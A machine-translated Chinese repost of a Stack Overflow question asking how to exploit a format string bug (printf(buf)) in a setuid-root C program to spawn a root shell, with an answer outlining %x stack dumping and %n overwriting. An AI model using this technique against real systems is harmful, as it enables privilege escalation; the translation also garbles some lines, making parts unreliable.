如何使用缓冲区溢出执行“printf字符串攻击”?
[英]How can I perform a “printf string attack” using a buffer overflow?
问题描述
The code: 
代码:
void doit()
{
system("/bin/sh");
exit(0);
}
int main(int argc, char **argv)
{
static int the_var;
char buf[512];
the_var = 20;
strncpy (buf, argv[1], sizeof(buf) - 1);
printf (buf);
if (the_var != 20)
{
doit();
} else {
printf ("\nthe_var @ 0x%08x = %d 0x%08x\n", &the_var, the_var, the_var);
}
}
Program is running with sticky bit (owner uid 0) all I have to do is to crack it and run the /bin/sh as the root. 程序运行使用粘滞位(所有者uid 0)我所要做的就是破解它并以/bin/sh为根运行。
I know how to crack the program with fe . 我知道如何用fe破解程序。 buffer overflow and strcpy (shellcode), but don't how to to use 'format string attack' on this one. 缓冲区溢出和strcpy (shellcode),但是如何在这一个上使用'format string attack'。
As you can see, there is a var the_var , if it is not equal to 50 then shell is running (maybe try to change it somehow, some dirty magic?). 正如你所看到的,有一个var the_var ,如果它不等于50那么shell正在运行(也许试着以某种方式改变它,一些肮脏的魔法?)。 Anyway, there is a printf (buf) 无论如何,有一个printf (buf)
1 个解决方案
解决方案1
5 2012-06-17 09:06:14
You control buf . 你控制buf 。 Pass %x format strings to dump the stack and %n to overwrite the object the_var in the stack. 传递%x格式字符串以转储堆栈,并传递%x %n以覆盖堆栈中的对象the_var 。 From your program if the object the_var is overwritten, the doit function will be called and /bin/sh will be executed. 从你的程序,如果对象the_var被覆盖时, doit函数将被调用, /bin/sh将被执行。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.